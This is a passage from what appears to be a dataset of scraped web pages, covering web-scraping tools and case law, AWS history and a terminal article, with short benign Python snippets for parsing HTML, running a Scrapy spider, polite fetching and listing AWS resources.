websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
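Both techniques described here, regular-expression matching and XPath queries over a DOM tree, are easy to sketch in Python. The lxml library is an extra dependency (pip install lxml) not installed at the top of this notebook, and the page snippet is illustrative.

import re
from lxml import html   # assumes: pip install lxml

page = """
<html><body>
  <p>Contact sales@example.com or support@example.com for details.</p>
  <a href="https://example.com/pricing">Pricing</a>
</body></html>
"""

# 1. The grep-style approach: regular-expression matching on the raw text.
emails = re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", page)
print(emails)                       # ['sales@example.com', 'support@example.com']

# 2. DOM parsing: build a tree and query it with XPath expressions.
tree = html.fromstring(page)
print(tree.xpath("//a/@href"))      # ['https://example.com/pricing']
print(tree.xpath("//p/text()"))     # text nodes of the paragraph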
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
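Of the tools listed here, Scrapy is worth a short illustration because it structures a whole crawl rather than a single page. The spider below is a minimal sketch; Scrapy is not installed by the setup at the top of this notebook (pip install scrapy), and the selectors target quotes.toscrape.com, a public practice site for scrapers.

import scrapy   # assumes: pip install scrapy

class QuotesSpider(scrapy.Spider):
    """Minimal Scrapy spider: crawl a site and yield structured items."""
    name = "quotes"
    start_urls = ["https://quotes.toscrape.com/"]

    def parse(self, response):
        # CSS selectors split each quote block into fields.
        for quote in response.css("div.quote"):
            yield {
                "text": quote.css("span.text::text").get(),
                "author": quote.css("small.author::text").get(),
            }
        # Follow the pagination link so the whole site is crawled, not just page 1.
        next_page = response.css("li.next a::attr(href)").get()
        if next_page:
            yield response.follow(next_page, callback=self.parse)

# Typically run from a shell rather than inside a notebook, e.g.:
#   scrapy runspider quotes_spider.py -o quotes.json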
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
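On the scraper's side, a well-behaved bot can cooperate with such measures by honouring robots.txt and pacing its requests. Here is a minimal sketch using Python's standard urllib.robotparser together with requests; the site, user-agent string and delay are illustrative.

import time
import requests
from urllib.robotparser import RobotFileParser

USER_AGENT = "polite-research-bot"      # illustrative user-agent string
BASE = "https://example.com"            # placeholder site

# Read the site's robots.txt once and honour its rules before fetching anything.
robots = RobotFileParser()
robots.set_url(BASE + "/robots.txt")
robots.read()

def polite_get(path, delay=2.0):
    """Fetch a path only if robots.txt allows it, pausing between requests."""
    url = BASE + path
    if not robots.can_fetch(USER_AGENT, url):
        print(f"Skipping {url}: disallowed by robots.txt")
        return None
    time.sleep(delay)                   # crude rate limit so the server is not hammered
    return requests.get(url, headers={"User-Agent": USER_AGENT}, timeout=10)

# Example usage:
# response = polite_get("/listings")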
458 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Amazon_AWS | Amazon Web Services, Inc. (AWS) is a subsidiary of Amazon that provides on-demand cloud computing platforms and APIs to individuals, companies, and governments, on a metered, pay-as-you-go basis. Clients will often use this in combination with autoscaling (a process that allows a client to use more computing in times of high application usage, and then scale down to reduce costs when there is less traffic). These cloud computing web services provide various services related to networking, compute, storage, middleware, IoT and other processing capacity, as well as software tools via AWS server farms. This frees clients from managing, scaling, and patching hardware and operating systems. One of the foundational services is Amazon Elastic Compute Cloud (EC2), which allows users to have at their disposal a virtual cluster of computers, with extremely high availability, which can be interacted with over the internet via REST APIs, a CLI or the AWS console. AWS's virtual computers emulate most of the attributes of a real computer, including hardware central processing units (CPUs) and graphics processing units (GPUs) for processing; local RAM memory; Hard-disk(HDD) SSD storage; a choice of operating systems; networking; and pre-loaded application software such as web servers, databases, and customer relationship management (CRM). AWS services are delivered to customers via a network of AWS server farms located throughout the world. Fees are based on a combination of usage (known as a "Pay-as-you-go" model), hardware, operating system, software, and networking features chosen by the subscriber requiring various degrees of availability, redundancy, security, and service options. Subscribers can pay for a single virtual AWS computer, a dedicated physical computer, or clusters of either. 7 Amazon provides select portions of security for subscribers (e.g. physical security of the data centers) while other aspects of security are the responsibility of the subscriber (e.g. account management, vulnerability scanning, patching). AWS operates from many global geographical regions including seven in North America. 8 Amazon markets AWS to subscribers as a way of obtaining large-scale computing capacity more quickly and cheaply than building an actual physical server farm. 9 All services are billed based on usage, but each service measures usage in varying ways. As of 2023 Q1, AWS has 31% market share for cloud infrastructure while the next two competitors Microsoft Azure and Google Cloud have 25%, and 11% respectively, according to Synergy Research Group. 10 11 As of 2021, update AWS comprises over 200 12 products and services including computing, storage, networking, database, analytics, application services, deployment, management, machine learning, 13 mobile, developer tools, RobOps and tools for the Internet of Things. The most popular include Amazon Elastic Compute Cloud (EC2), Amazon Simple Storage Service (Amazon S3), Amazon Connect, and AWS Lambda (a serverless function that can perform arbitrary code written in any language that can be configured to be triggered by hundreds of events, including HTTP calls). 14 Services expose functionality through APIs for clients to use in their applications. These APIs are accessed over HTTP, using the REST architectural style and SOAP protocol for older APIs and exclusively JSON for newer ones. 
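In practice these HTTP/JSON service APIs are almost always called through a language SDK rather than hand-written REST calls. Below is a minimal sketch with boto3, the AWS SDK for Python; boto3 is not installed by the setup at the top of this notebook (pip install boto3), and the calls assume AWS credentials are already configured locally.

import boto3   # assumes: pip install boto3, plus configured AWS credentials

# The SDK wraps the service APIs described above in ordinary method calls.
s3 = boto3.client("s3")
ec2 = boto3.client("ec2", region_name="us-east-1")

# List the S3 buckets owned by the account.
for bucket in s3.list_buckets()["Buckets"]:
    print("bucket:", bucket["Name"])

# List EC2 instances in one region, with their current state.
for reservation in ec2.describe_instances()["Reservations"]:
    for instance in reservation["Instances"]:
        print("instance:", instance["InstanceId"], instance["State"]["Name"])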
Clients can interact with these APIs in various ways, including from the AWS console (a website), by using SDKs written in various languages (such as Python, Java, and JavaScript), or by making direct REST calls. The genesis of AWS came in the early 2000s. After building Merchant.com, Amazon's e-commerce-as-a-service platform that offers third-party retailers a way to build their own web-stores, Amazon pursued service-oriented architecture as a means to scale its engineering operations, 15 16 17 18 19 20 21 led by then CTO Allan Vermeulen. 22 Around the same time frame, Amazon was frustrated with the speed of its software engineering, and sought to implement various recommendations put forth by Matt Round, an engineering leader at the time, including maximization of autonomy for engineering teams, adoption of REST, standardization of infrastructure, removal of gate-keeping decision-makers (bureaucracy), and continuous deployment. He also called for increasing the percentage of the time engineers spent building the software rather than doing other tasks. 23 Amazon created "a shared IT platform" so its engineering organizations, which were spending 70% of their time on "undifferentiated heavy-lifting" such as IT and infrastructure problems, could focus on customer-facing innovation instead. 24 25 Besides, in dealing with unusual peak traffic patterns, especially during the holiday season, by migrating services to commodity Linux hardware and relying on open source software, Amazon's Infrastructure team, led by Tom Killalea, 26 Amazon's first CISO, 27 had already run its data centers and associated services in a "fast, reliable, cheap" way. 26 In July 2002 Amazon.com Web Services, managed by Colin Bryar, 28 launched its first web services, opening up the Amazon.com platform to all developers. 29 Over one hundred applications were built on top of it by 2004. 30 This unexpected developer interest took Amazon by surprise and convinced them that developers were "hungry for more". 25 By the summer of 2003, Andy Jassy had taken over Bryar's portfolio 31 at Rick Dalzell's behest, after Vermeulen, who was Bezos' first pick, declined the offer. 22 Jassy subsequently mapped out the vision for an "Internet OS" 15 17 19 32 made up of foundational infrastructure primitives that alleviated key impediments to shipping software applications faster. 15 16 17 19 21 By fall 2003, 15 17 databases, storage, and compute were identified as the first set of infrastructure pieces that Amazon should launch. 15 17 25 Jeff Barr, an early AWS employee, credits Vermeulen, Jassy, Bezos himself, and a few others for coming up with the idea that would evolve into EC2, S3, and RDS; 33 Jassy recalls the idea was the result of brainstorming for about a week with "ten of the best technology minds and ten of the best product management minds" on about ten different internet applications and the most primitive building blocks required to build them. 19 Werner Vogels cites Amazon's desire to make the process of "invent, launch, reinvent, relaunch, start over, rinse, repeat" as fast as it could was leading them to break down organizational structures with "two-pizza teams" c and application structures with distributed systems; d and that these changes ultimately paved way for the formation of AWS 21 and its mission "to expose all of the atomic-level pieces of the Amazon.com platform". 
36 According to Brewster Kahle, co-founder of Alexa Internet, which was acquired by Amazon in 1999, his start-up's compute infrastructure helped Amazon solve its big data problems and later informed the innovations that underpinned AWS. 37 Jassy assembled a founding team of 57 employees from a mix of engineering and business backgrounds to kick-start these initiatives, 19 18 with a majority of the hires coming from outside the company; 19 Jeff Lawson, Twilio CEO, 38 Adam Selipsky, Tableau CEO, 39 40 and Mikhail Seregine, 41 co-founder at Outschool among them. In late 2003, the concept for compute, e which would later launch as EC2, was reformulated when Chris Pinkham and Benjamin Black presented a paper internally describing a vision for Amazon's retail computing infrastructure that was completely standardized, completely automated, and would rely extensively on web services for services such as storage and would draw on internal work already underway. Near the end of their paper, they mentioned the possibility of selling access to virtual servers as a service, proposing the company could generate revenue from the new infrastructure investment. 43 unreliable source? Thereafter Pinkham, Willem van Biljon, and lead developer Christopher Brown developed the Amazon EC2 service, with a team in Cape Town, South Africa. 44 In November 2004, AWS launched its first infrastructure service for public usage: Simple Queue Service (SQS). 45 On March 14, 2006, AWS launched Amazon S3 cloud storage 46 followed by EC2 in August 2006. 47 48 Andy Jassy, AWS founder and vice president in 2006, said at the time that Amazon S3 "helps free developers from worrying about where they are going to store data, whether it will be safe and secure, if it will be available when they need it, the costs associated with server maintenance, or whether they have enough storage available. Amazon S3 enables developers to focus on innovating with data, rather than figuring out how to store it. 1 Pi Corporation, a startup Paul Maritz co-founded, was the first beta-user of EC2 outside of Amazon, 19 while Microsoft was among EC2's first enterprise customers. 49 Later that year, SmugMug, one of the early AWS adopters, attributed savings of around US$400,000 in storage costs to S3. 50 According to Vogels, S3 was built with 8 microservices when it launched in 2006, but had over 300 microservices by 2022. 51 In September 2007, AWS announced its annual Start-up Challenge, a contest with prizes worth $100,000 for entrepreneurs and software developers based in the US using AWS services such as S3 and EC2 to build their businesses. 52 The first edition saw participation from Justin.tv, 53 which Amazon would later acquire in 2014. 54 Ooyala, an online media company, 55 was the eventual winner. 53 Additional AWS services from this period include SimpleDB, Mechanical Turk, Elastic Block Store, Elastic Beanstalk, Relational Database Service, DynamoDB, CloudWatch, Simple Workflow, CloudFront, and Availability Zones. In November 2010, it was reported that all of Amazon.com's retail sites had migrated to AWS. 56 Prior to 2012, AWS was considered a part of Amazon.com and so its revenue was not delineated in Amazon financial statements. In that year industry watchers for the first time estimated AWS revenue to be over $1.5 billion. 57 On November 27, 2012, AWS hosted its first major annual conference, re:Invent with a focus on AWS's partners and ecosystem, 58 with over 150 sessions. 
59 The three-day event was held in Las Vegas because of its relatively cheaper connectivity with locations across the United States and the rest of the world. 60 Andy Jassy and Werner Vogels presented keynotes, with Jeff Bezos joining Vogels for a fireside chat. 61 AWS opened early registrations at US$1,099 per head for their customers 59 from over 190 countries. 62 On stage with Andy Jassy at the event which saw around 6000 attendees, Reed Hastings, CEO at Netflix, announced plans to migrate 100% of Netflix's infrastructure to AWS. 61 To support industry-wide training and skills standardization, AWS began offering a certification program for computer engineers, on April 30, 2013, to highlight expertise in cloud computing. 63 Later that year, in October, AWS launched Activate, a program for start-ups worldwide to leverage AWS credits, third-party integrations, and free access to AWS experts to help build their business. 64 In 2014, AWS launched its partner network, AWS Partner Network (APN), which is focused on helping AWS-based companies grow and scale the success of their business with close collaboration and best practices. 65 66 In January 2015, Amazon Web Services acquired Annapurna Labs, an Israel-based microelectronics company for a reported US$350 370M. 67 68 In April 2015, Amazon.com reported AWS was profitable, with sales of $1.57 billion in the first quarter of the year and $265 million of operating income. Founder Jeff Bezos described it as a fast-growing $5 billion business; analysts described it as "surprisingly more profitable than forecast". 69 In October, Amazon.com said in its Q3 earnings report that AWS's operating income was $521 million, with operating margins at 25 percent. AWS's 2015 Q3 revenue was $2.1 billion, a 78% increase from 2014's Q3 revenue of $1.17 billion. 70 2015 Q4 revenue for the AWS segment increased 69.5% y y to $2.4 billion with a 28.5% operating margin, giving AWS a $9.6 billion run rate. In 2015, Gartner estimated that AWS customers are deploying 10x more infrastructure on AWS than the combined adoption of the next 14 providers. 71 In 2016 Q1, revenue was $2.57 billion with net income of $604 million, a 64% increase over 2015 Q1 that resulted in AWS being more profitable than Amazon's North American retail business for the first time. 72 Jassy was thereafter promoted to CEO of the division. 73 Around the same time, Amazon experienced a 42% rise in stock value as a result of increased earnings, of which AWS contributed 56% to corporate profits. 74 AWS had $17.46 billion in annual revenue in 2017. 75 By the end of 2020, the number had grown to $46 billion. 76 Reflecting the success of AWS, Jassy's annual compensation in 2017 hit nearly $36 million. 77 In January 2018, Amazon launched an autoscaling service on AWS. 78 79 In November 2018, AWS announced customized ARM cores for use in its servers. 80 Also in November 2018, AWS is developing ground stations to communicate with customers' satellites. 81 In 2019, AWS reported 37% yearly growth and accounted for 12% of Amazon's revenue (up from 11% in 2018). 82 In April 2021, AWS reported 32% yearly growth and accounted for 32% of $41.8 billion cloud market in Q1 2021. 83 In January 2022, AWS joined the MACH Alliance, a non-profit enterprise technology advocacy group. 84 In June 2022, it was reported that in 2019 Capital One had not secured their AWS resources properly, and was subject to a data breach by a former AWS employee. 
The employee was convicted of hacking into the company's cloud servers to steal customer data and use computer power to mine cryptocurrency. The ex-employee was able to download the personal information of more than 100 million Capital One customers. 85 In June 2022, AWS announced they had launched the AWS Snowcone, a small computing device, to the International Space Station on the Axiom Mission 1. 86 In September 2023, AWS announced it would become AI startup Anthropic's primary cloud provider. Amazon has committed to investing up to $4 billion in Anthropic and will have a minority ownership position in the company. 87 AWS also announced the GA of Amazon Bedrock, a fully managed service that makes foundation models (FMs) from leading AI companies available through a single application programming interface (API) 88 In April 2024, AWS announced a new service called Deadline Cloud, which lets customers set up, deploy and scale up graphics and visual effects rendering pipelines on AWS cloud infrastructure. 89 Notable customers include NASA, 90 and the Obama presidential campaign of 2012. 91 In October 2013, AWS was awarded a $600M contract with the CIA. 92 In 2019, it was reported that more than 80% of Germany's listed DAX companies use AWS. 93 In August 2019, the U.S. Navy said it moved 72,000 users from six commands to an AWS cloud system as a first step toward pushing all of its data and analytics onto the cloud. 94 In 2021, DISH Network announced it will develop and launch its 5G network on AWS. 95 In October 2021, it was reported that spy agencies and government departments in the UK such as GCHQ, MI5, MI6, and the Ministry of Defence, have contracted AWS to host their classified materials. 96 Multiple financial services firms have shifted to AWS in some form. 97 98 99 As of March 2024, update AWS has distinct operations in 33 geographical "regions": 8 eight in North America, one in South America, eight in Europe, three in the Middle East, one in Africa, and twelve in Asia Pacific. Most AWS regions are enabled by default for AWS accounts. Regions introduced after 20 March 2019 are considered to be opt-in regions, requiring a user to explicitly enable them in order for the region to be usable in the account. For opt-in regions, Identity and Access Management (IAM) resources such as users and roles are only propagated to the regions that are enabled. 110 Each region is wholly contained within a single country and all of its data and services stay within the designated region. 7 Each region has multiple "Availability Zones", 111 which consist of one or more discrete data centers, each with redundant power, networking, and connectivity, housed in separate facilities. Availability Zones do not automatically provide additional scalability or redundancy within a region, since they are intentionally isolated from each other to prevent outages from spreading between zones. Several services can operate across Availability Zones (e.g., S3, DynamoDB) while others can be configured to replicate across zones to spread demand and avoid downtime from failures. As of December 2014, update Amazon Web Services operated an estimated 1.4 million servers across 11 regions and 28 availability zones. 112 The global network of AWS Edge locations consists of over 300 points of presence worldwide, including locations in North America, Europe, Asia, Australia, Africa, and South America. 
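The region and opt-in behaviour described here can be inspected programmatically. A short sketch follows, again assuming boto3 and configured credentials as in the earlier example.

import boto3   # assumes boto3 is installed and credentials are configured

ec2 = boto3.client("ec2", region_name="us-east-1")

# AllRegions=True also returns regions the account has not opted into.
for region in ec2.describe_regions(AllRegions=True)["Regions"]:
    print(region["RegionName"], "-", region["OptInStatus"])
# OptInStatus is 'opt-in-not-required' for default regions and
# 'opted-in' / 'not-opted-in' for the newer opt-in regions mentioned above.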
113 As of March 2024, update AWS has announced the planned launch of six additional regions in Malaysia, Mexico, New Zealand, Thailand, Saudi Arabia, and the European Union. 8 In mid March 2023, Amazon Web Services signed a cooperation agreement with the New Zealand Government to build large data centers in New Zealand. 114 In 2014, AWS claimed its aim was to achieve 100% renewable energy usage in the future. 115 In the United States, AWS's partnerships with renewable energy providers include Community Energy of Virginia, to support the US East region; 116 Pattern Development, in January 2015, to construct and operate Amazon Wind Farm Fowler Ridge; 117 Iberdrola Renewables, LLC, in July 2015, to construct and operate Amazon Wind Farm US East; EDP Renewables North America, in November 2015, to construct and operate Amazon Wind Farm US Central; 118 and Tesla Motors, to apply battery storage technology to address power needs in the US West (Northern California) region. 116 AWS also has "pop-up lofts" in different locations around the world. 119 These market AWS to entrepreneurs and startups in different tech industries in a physical location. Visitors can work or relax inside the loft, or learn more about what they can do with AWS. In June 2014, AWS opened their first temporary pop-up loft in San Francisco. 120 In May 2015 they expanded to New York City, 121 122 and in September 2015 expanded to Berlin. 123 AWS opened its fourth location, in Tel Aviv from March 1, 2016, to March 22, 2016. 124 A pop-up loft was open in London from September 10 to October 29, 2015. 125 The pop-up lofts in New York 126 and San Francisco 127 are indefinitely closed due to the COVID 19 pandemic while Tokyo has remained open in a limited capacity. 128 In 2017, AWS launched AWS re Start in the United Kingdom to help young adults and military veterans retrain in technology-related skills. In partnership with the Prince's Trust and the Ministry of Defence (MoD), AWS will help to provide re-training opportunities for young people from disadvantaged backgrounds and former military personnel. AWS is working alongside a number of partner companies including Cloudreach, Sage Group, EDF Energy, and Tesco Bank. 129 In April 2022, AWS announced the organization has committed more than $30 million over three years to early-stage start-ups led by Black, Latino, LGBTQIA , and Women founders as part of its AWS impact Accelerator. The Initiative offers qualifying start-ups up to $225,000 in cash, credits, extensive training, mentoring, technical guidance and includes up to $100,000 in AWS service credits. 130 In 2016, Greenpeace assessed major tech companies—including cloud services providers like AWS, Microsoft, Oracle, Google, IBM, Salesforce and Rackspace—based on their level of "clean energy" usage. Greenpeace evaluated companies on their mix of renewable-energy sources; transparency; renewable-energy commitment and policies; energy efficiency and greenhouse-gas mitigation; renewable-energy procurement; and advocacy. The group gave AWS an overall "C" grade. Greenpeace credited AWS for its advances toward greener computing in recent years and its plans to launch multiple wind and solar farms across the United States. The organization stated that Amazon is opaque about its carbon footprint. 131 In January 2021, AWS joined an industry pledge to achieve climate neutrality of data centers by 2030, the Climate Neutral Data Centre Pact. 
132 As of 2023, Amazon as a whole is the largest corporate purchaser of renewable energy in the world, a position it has held since 2020, and has a global portfolio of over 20 GW of renewable energy capacity. 133 In 2022, 90% of all Amazon operations, including data centers, were powered by renewables. 134 US Department of Homeland Security has employed the software ATLAS, which runs on Amazon Cloud. It scanned more than 16.5 million records of naturalized Americans and flagged approximately 124,000 of them for manual analysis and review by USCIS officers regarding denaturalization. 135 136 Some of the scanned data came from the Terrorist Screening Database and the National Crime Information Center. The algorithm and the criteria for the algorithm were secret. Amazon faced protests from its own employees and activists for the anti-migrant collaboration with authorities. 137 The contract for Project Nimbus drew rebuke and condemnation from the companies' shareholders as well as their employees, over concerns that the project would lead to abuses of Palestinians' human rights in the context of the ongoing occupation and the Israeli Palestinian conflict. 138 139 140 141 Specifically, they voice concern over how the technology will enable further surveillance of Palestinians and unlawful data collection on them as well as facilitate the expansion of Israel's illegal settlements on Palestinian land. 140 A government procurement document featuring 'obligatory customers' of Nimbus, including "two of Israel’s leading state-owned weapons manufacturers" Israel Aerospace Industries and Rafael Advanced Defense Systems, was published in 2021 with periodic updates since (up to Oct 2023). 142 |
459 | https://en.wikipedia.org/wiki/Web_scraping | https://techcrunch.com/2022/04/18/web-scraping-legal-court/ | Comment Good news for archivists, academics, researchers and journalists: Scraping publicly accessible data is legal, according to a U.S. appeals court ruling. The landmark ruling by the U.S. Ninth Circuit of Appeals is the latest in a long-running legal battle brought by LinkedIn aimed at stopping a rival company from web scraping personal information from users’ public profiles. The case reached the U.S. Supreme Court last year but was sent back to the Ninth Circuit for the original appeals court to re-review the case. In its second ruling on Monday, the Ninth Circuit reaffirmed its original decision and found that scraping data that is publicly accessible on the internet is not a violation of the Computer Fraud and Abuse Act, or CFAA, which governs what constitutes computer hacking under U.S. law. The Ninth Circuit’s decision is a major win for archivists, academics, researchers and journalists who use tools to mass collect, or scrape, information that is publicly accessible on the internet. Without a ruling in place, long-running projects to archive websites no longer online and using publicly accessible data for academic and research studies have been left in legal limbo. But there have been egregious cases of web scraping that have sparked privacy and security concerns. Facial recognition startup Clearview AI claims to have scraped billions of social media profile photos, prompting several tech giants to file lawsuits against the startup. Several companies, including Facebook, Instagram, Parler, Venmo and Clubhouse have all had users’ data scraped over the years. The case before the Ninth Circuit was originally brought by LinkedIn against Hiq Labs, a company that uses public data to analyze employee attrition. LinkedIn said Hiq’s mass web scraping of LinkedIn user profiles was against its terms of service, amounted to hacking and was therefore a violation of the CFAA. LinkedIn first lost the case against Hiq in 2019 after the Ninth Circuit found that the CFAA does not bar anyone from scraping data that’s publicly accessible. On its second pass of the case, the Ninth Circuit said it relied on a Supreme Court decision last June, during which the U.S. top court took its first look at the decades-old CFAA. In its ruling, the Supreme Court narrowed what constitutes a violation of the CFAA as those who gain unauthorized access to a computer system — rather than a broader interpretation of exceeding existing authorization, which the court argued could have attached criminal penalties to “a breathtaking amount of commonplace computer activity. Using a “gate-up, gate-down” analogy, the Supreme Court said that when a computer or website’s gates are up — and therefore information is publicly accessible — no authorization is required. The Ninth Circuit, in referencing the Supreme Court’s “gate-up, gate-down” analogy, ruled that “the concept of without authorization’ does not apply to public websites. “We’re disappointed in the court’s decision. This is a preliminary ruling and the case is far from over, said LinkedIn spokesperson Greg Snapper in a statement. “We will continue to fight to protect our members’ ability to control the information they make available on LinkedIn. When your data is taken without permission and used in ways you haven’t agreed to, that’s not okay. 
On LinkedIn, our members trust us with their information, which is why we prohibit unauthorized scraping on our platform.” |
461 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Dumb_terminal | A computer terminal is an electronic or electromechanical hardware device that can be used for entering data into, and transcribing 1 data from, a computer or a computing system. 2 Most early computers only had a front panel to input or display bits and had to be connected to a terminal to print or input text through a keyboard. Teleprinters were used as early-day hard-copy terminals 3 4 and predated the use of a computer screen by decades. The computer would typically transmit a line of data which would be printed on paper, and accept a line of data from a keyboard over a serial or other interface. Starting in the mid 1970s with microcomputers such as the Sphere 1, Sol 20, and Apple I, display circuitry and keyboards began to be integrated into personal and workstation computer systems, with the computer handling character generation and outputting to a CRT display such as a computer monitor or, sometimes, a consumer TV, but most larger computers continued to require terminals. Early terminals were inexpensive devices but very slow compared to punched cards or paper tape for input; with the advent of time-sharing systems, terminals slowly pushed these older forms of interaction from the industry. Related development were the improvement of terminal technology and the introduction of inexpensive video displays. Early Teletypes only printed out with a communications speed of only 75 baud or 10 5 bit characters per second, and by the 1970s speeds of video terminals had improved to 2400 or 9600 2400 bit s. Similarly, the speed of remote batch terminals had improved to 4800 bit s at the beginning of the decade and 19.6 kbps by the end of the decade, with higher speeds possible on more expensive terminals. The function of a terminal is typically confined to transcription and input of data; a 